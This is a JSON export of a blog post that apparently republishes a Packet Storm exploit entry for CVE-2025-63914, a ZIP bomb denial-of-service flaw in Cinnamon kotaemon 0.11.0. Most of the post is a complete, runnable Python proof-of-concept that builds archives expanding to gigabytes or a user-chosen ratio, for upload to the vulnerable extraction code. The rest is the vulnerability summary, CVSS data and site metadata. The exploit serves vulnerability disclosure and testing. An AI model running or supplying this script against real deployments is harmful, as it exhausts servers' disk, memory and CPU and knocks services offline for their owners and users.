{"id":29320,"date":"2025-12-08T09:42:03","date_gmt":"2025-12-08T09:42:03","guid":{"rendered":"http:\/\/localhost\/?p=29320"},"modified":"2025-12-08T09:42:03","modified_gmt":"2025-12-08T09:42:03","slug":"cinnamon-kotaemon-0110-zip-bomb","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=29320","title":{"rendered":"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-08T15:28:02&#8243;,&#8221;description&#8221;:&#8221;Cinnamon kotaemon version 0.11.0 zip bomb proof of concept denial of service exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212535&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-63914&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Cinnamon kotaemon v 0.11.0 ZIP Bomb Vulnerability in Cinnamon\/kotaemon &#8211; Proof of Concept                                   |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/github.com\/cinnamon\/kotaemon                                                                                        |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/212312\/ \\u0026 CVE-2025-63914\\n    \\n    [+] Summary : CVE-2025-63914 is a critical denial-of-service vulnerability in the Cinnamon\/kotaemon application that allows authenticated attackers to upload malicious ZIP archives \\n                  containing extreme compression ratios. The vulnerability exists in the _may_extract_zip function within \\\\libs\\\\ktem\\\\ktem\\\\index\\\\file\\\\ui.py, which performs ZIP file extraction without \\n                  enforcing any limits on decompressed size, file count, or compression ratios.\\n                  When exploited, this vulnerability enables attackers to create \\&#8221;ZIP bombs\\&#8221; &#8211; archives that appear small (kilobytes) but expand to enormous sizes \\n    \\t\\t\\t  (gigabytes or terabytes) when extracted. This triggers uncontrolled consumption of disk space, CPU, and memory resources, potentially leading to complete system unavailability and service crashes.\\n                  All instances up to version 0.11.0 are affected, requiring immediate patching or mitigation implementation.\\n    \\n    [+]  POC : python poc.py\\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import zipfile\\n    import os\\n    import sys\\n    import tempfile\\n    import shutil\\n    \\n    def create_simple_zip_bomb(output_file=\\&#8221;zip_bomb.zip\\&#8221;, compressed_size_mb=1, ratio=10000):\\n        \\&#8221;\\&#8221;\\&#8221;\\n        Create a simple ZIP bomb with highly compressible data\\n        \\&#8221;\\&#8221;\\&#8221;\\n        print(f\\&#8221;[*] Creating ZIP bomb: {output_file}\\&#8221;)\\n        print(f\\&#8221;[*] Target compressed size: {compressed_size_mb}MB\\&#8221;)\\n        print(f\\&#8221;[*] Target expansion ratio: 1:{ratio}\\&#8221;)\\n        \\n        # Calculate uncompressed size\\n        uncompressed_size = compressed_size_mb * ratio * 1024 * 1024\\n        print(f\\&#8221;[*] Expected uncompressed size: {uncompressed_size\/(1024**3):.2f}GB\\&#8221;)\\n        \\n        try:\\n            with zipfile.ZipFile(output_file, &#8216;w&#8217;, zipfile.ZIP_DEFLATED, compresslevel=9) as zipf:\\n                # Create highly compressible data (zeros)\\n                chunk_size = 1024 * 1024  # 1MB\\n                total_chunks = compressed_size_mb * 10  # Create multiple chunks\\n                \\n                for i in range(total_chunks):\\n                    # Create compressible data (repeating zeros)\\n                    compressible_data = b&#8217;\\\\x00&#8242; * chunk_size\\n                    zipf.writestr(f\\&#8221;bomb_file_{i:04d}.bin\\&#8221;, compressible_data)\\n                    \\n                    # Progress indicator\\n                    if i % 10 == 0:\\n                        progress = (i + 1) \/ total_chunks * 100\\n                        sys.stdout.write(f\\&#8221;\\\\r[*] Progress: {progress:.1f}%\\&#8221;)\\n                        sys.stdout.flush()\\n            \\n            print(f\\&#8221;\\\\n[+] ZIP bomb created: {output_file}\\&#8221;)\\n            \\n            # Show file info\\n            file_size = os.path.getsize(output_file)\\n            print(f\\&#8221;[+] Actual size: {file_size\/(1024*1024):.2f}MB\\&#8221;)\\n            \\n            # Verify the file\\n            with zipfile.ZipFile(output_file, &#8216;r&#8217;) as zipf:\\n                file_count = len(zipf.namelist())\\n                total_size = sum(info.file_size for info in zipf.filelist)\\n                print(f\\&#8221;[+] Files in archive: {file_count}\\&#8221;)\\n                print(f\\&#8221;[+] Total uncompressed size: {total_size\/(1024**3):.2f}GB\\&#8221;)\\n                if total_size \\u003e 0:\\n                    print(f\\&#8221;[+] Compression ratio: {total_size\/file_size:.0f}:1\\&#8221;)\\n            \\n            return True\\n            \\n        except Exception as e:\\n            print(f\\&#8221;\\\\n[-] Error: {e}\\&#8221;)\\n            return False\\n    \\n    def create_quick_zip_bomb():\\n        \\&#8221;\\&#8221;\\&#8221;\\n        Create a quick test ZIP bomb (small for testing)\\n        \\&#8221;\\&#8221;\\&#8221;\\n        print(\\&#8221;[*] Creating quick test ZIP bomb&#8230;\\&#8221;)\\n        \\n        output_file = \\&#8221;test_bomb.zip\\&#8221;\\n        \\n        try:\\n            with zipfile.ZipFile(output_file, &#8216;w&#8217;, zipfile.ZIP_DEFLATED, compresslevel=9) as zipf:\\n                # Add multiple highly compressible files\\n                for i in range(100):\\n                    # 10KB of zeros (compresses to about 100 bytes)\\n                    data = b&#8217;\\\\x00&#8242; * (10 * 1024)\\n                    zipf.writestr(f\\&#8221;file_{i:03d}.dat\\&#8221;, data)\\n            \\n            print(f\\&#8221;[+] Created: {output_file}\\&#8221;)\\n            \\n            # Show info\\n            size = os.path.getsize(output_file)\\n            print(f\\&#8221;[+] Size: {size} bytes ({size\/1024:.1f}KB)\\&#8221;)\\n            \\n            return True\\n            \\n        except Exception as e:\\n            print(f\\&#8221;[-] Error: {e}\\&#8221;)\\n            return False\\n    \\n    def main():\\n        print(\\&#8221;=\\&#8221; * 60)\\n        print(\\&#8221;CVE-2025-63914 &#8211; Zip Bomb Proof of Concept\\&#8221;)\\n        print(\\&#8221;FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY\\&#8221;)\\n        print(\\&#8221;=\\&#8221; * 60)\\n        print()\\n        \\n        print(\\&#8221;[!] WARNING: This creates potentially dangerous ZIP files\\&#8221;)\\n        print(\\&#8221;[!] Use only in controlled test environments\\&#8221;)\\n        print(\\&#8221;[!] Do NOT extract on production systems\\&#8221;)\\n        print()\\n        \\n        print(\\&#8221;Choose option:\\&#8221;)\\n        print(\\&#8221;1. Create simple ZIP bomb (1MB -\\u003e ~10GB)\\&#8221;)\\n        print(\\&#8221;2. Create quick test bomb (small, safe for testing)\\&#8221;)\\n        print(\\&#8221;3. Custom ZIP bomb\\&#8221;)\\n        print(\\&#8221;4. Exit\\&#8221;)\\n        \\n        choice = input(\\&#8221;\\\\nEnter choice (1-4): \\&#8221;).strip()\\n        \\n        if choice == \\&#8221;1\\&#8221;:\\n            create_simple_zip_bomb(\\&#8221;zip_bomb.zip\\&#8221;, 1, 10000)\\n        elif choice == \\&#8221;2\\&#8221;:\\n            create_quick_zip_bomb()\\n        elif choice == \\&#8221;3\\&#8221;:\\n            try:\\n                size = int(input(\\&#8221;Enter compressed size in MB (e.g., 1): \\&#8221;))\\n                ratio = int(input(\\&#8221;Enter expansion ratio (e.g., 10000): \\&#8221;))\\n                filename = input(\\&#8221;Enter output filename (default: custom_bomb.zip): \\&#8221;).strip()\\n                if not filename:\\n                    filename = \\&#8221;custom_bomb.zip\\&#8221;\\n                create_simple_zip_bomb(filename, size, ratio)\\n            except ValueError:\\n                print(\\&#8221;[-] Invalid input\\&#8221;)\\n        elif choice == \\&#8221;4\\&#8221;:\\n            print(\\&#8221;[-] Exiting\\&#8221;)\\n            return\\n        else:\\n            print(\\&#8221;[-] Invalid choice\\&#8221;)\\n        \\n        print()\\n        print(\\&#8221;[*] Done!\\&#8221;)\\n        print(\\&#8221;[!] REMINDER: For authorized security testing only\\&#8221;)\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()\\n    \\t\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212535&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:6.5,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:N\/I:N\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212535\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-08T15:28:02&#8243;,&#8221;description&#8221;:&#8221;Cinnamon kotaemon version 0.11.0 zip bomb proof of concept denial of service exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212535&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-63914&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title : Cinnamon kotaemon v&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-29320","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=29320\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-08T15:28:02&#8243;,&#8221;description&#8221;:&#8221;Cinnamon kotaemon version 0.11.0 zip bomb proof of concept denial of service exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212535&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-63914&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : Cinnamon kotaemon v...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=29320\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-08T09:42:03+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29320#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29320\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535\",\"datePublished\":\"2025-12-08T09:42:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29320\"},\"wordCount\":985,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.5\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29320#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29320\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29320\",\"name\":\"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-08T09:42:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29320#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29320\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29320#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=29320","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-08T15:28:02&#8243;,&#8221;description&#8221;:&#8221;Cinnamon kotaemon version 0.11.0 zip bomb proof of concept denial of service exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-08T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212535&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-63914&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : Cinnamon kotaemon v...","og_url":"https:\/\/zero.redgem.net\/?p=29320","og_site_name":"zero redgem","article_published_time":"2025-12-08T09:42:03+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=29320#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=29320"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535","datePublished":"2025-12-08T09:42:03+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=29320"},"wordCount":985,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.5","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=29320#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=29320","url":"https:\/\/zero.redgem.net\/?p=29320","name":"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-08T09:42:03+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=29320#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=29320"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=29320#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Cinnamon kotaemon 0.11.0 ZIP Bomb_PACKETSTORM:212535"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29320","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29320"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29320\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29320"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=29320"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=29320"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}